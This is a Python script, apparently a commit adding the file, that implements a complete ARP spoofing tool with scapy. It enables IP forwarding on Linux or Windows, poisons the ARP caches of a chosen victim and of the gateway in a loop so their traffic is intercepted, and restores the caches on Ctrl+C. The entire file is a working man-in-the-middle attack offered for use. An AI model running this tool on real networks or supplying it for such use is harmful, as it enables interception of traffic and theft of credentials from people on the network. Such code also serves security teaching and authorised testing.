1+ from scapy .all import Ether , ARP , srp , send
2+ import argparse
3+ import time
4+ import os
5+ import sys
6+
7+ def _enable_linux_iproute ():
8+ """
9+ Enables IP route ( IP Forward ) in linux-based distro
10+ """
11+ file_path = "/proc/sys/net/ipv4/ip_forward"
12+ with open (file_path ) as f :
13+ if f .read () == 1 :
14+ # already enabled
15+ return
16+ with open (file_path , "w" ) as f :
17+ print (1 , file = f )
18+
19+
20+ def _enable_windows_iproute ():
21+ """
22+ Enables IP route (IP Forwarding) in Windows
23+ """
24+ from services import WService
25+ # enable Remote Access service
26+ service = WService ("RemoteAccess" )
27+ service .start ()
28+
29+
30+ def enable_ip_route (verbose = True ):
31+ """
32+ Enables IP forwarding
33+ """
34+ if verbose :
35+ print ("[!] Enabling IP Routing..." )
36+ _enable_windows_iproute () if "nt" in os .name else _enable_linux_iproute ()
37+ if verbose :
38+ print ("[!] IP Routing enabled." )
39+
40+
41+ def get_mac (ip ):
42+ ans , _ = srp (Ether (dst = 'ff:ff:ff:ff:ff:ff' )/ ARP (pdst = ip ), timeout = 3 , verbose = 0 )
43+ if ans :
44+ return ans [0 ][1 ].src
45+
46+
47+ def spoof (target_ip , host_ip , verbose = True ):
48+ """
49+ Spoofs `target_ip` saying that we are `host_ip`.
50+ it is accomplished by changing the ARP cache of the target (poisoning)
51+ """
52+ # get the mac address of the target
53+ target_mac = get_mac (target_ip )
54+ # craft the arp 'is-at' operation packet, in other words; an ARP response
55+ # we don't specify 'hwsrc' (source MAC address)
56+ # because by default, 'hwsrc' is the real MAC address of the sender
57+ arp_response = ARP (pdst = target_ip , hwdst = target_mac , psrc = host_ip , op = 'is-at' )
58+ # send the packet
59+ # verbose = 0 means that we send the packet without printing any thing
60+ send (arp_response , verbose = 0 )
61+ if verbose :
62+ # get the MAC address of the default interface we are using
63+ self_mac = ARP ().hwsrc
64+ print ("[+] Sent to {} : {} is-at {}" .format (target_ip , host_ip , self_mac ))
65+
66+
67+ def restore (target_ip , host_ip , verbose = True ):
68+ """
69+ Restores the normal process of a regular network
70+ This is done by sending the original informations
71+ (real IP and MAC of `host_ip` ) to `target_ip`
72+ """
73+ # get the real MAC address of target
74+ target_mac = get_mac (target_ip )
75+ # get the real MAC address of spoofed (gateway, i.e router)
76+ host_mac = get_mac (host_ip )
77+ # crafting the restoring packet
78+ arp_response = ARP (pdst = target_ip , hwdst = target_mac , psrc = host_ip , hwsrc = host_mac )
79+ # sending the restoring packet
80+ # to restore the network to its normal process
81+ # we send each reply seven times for a good measure (count=7)
82+ send (arp_response , verbose = 0 , count = 7 )
83+ if verbose :
84+ print ("[+] Sent to {} : {} is-at {}" .format (target_ip , host_ip , host_mac ))
85+
86+
87+ if __name__ == "__main__" :
88+ parser = argparse .ArgumentParser (description = "ARP spoof script" )
89+ parser .add_argument ("target" , help = "Victim IP Address to ARP poison" )
90+ parser .add_argument ("host" , help = "Host IP Address, the host you wish to intercept packets for (usually the gateway)" )
91+ parser .add_argument ("-v" , "--verbose" , action = "store_true" , help = "verbosity, default is True (simple message each second)" )
92+ args = parser .parse_args ()
93+ target , host , verbose = args .target , args .host , args .verbose
94+
95+ enable_ip_route ()
96+ try :
97+ while True :
98+ # telling the `target` that we are the `host`
99+ spoof (target , host , verbose )
100+ # telling the `host` that we are the `target`
101+ spoof (host , target , verbose )
102+ # sleep for one second
103+ time .sleep (1 )
104+ except KeyboardInterrupt :
105+ print ("[!] Detected CTRL+C ! restoring the network, please wait..." )
106+ restore (target , host )
107+ restore (host , target )
0 commit comments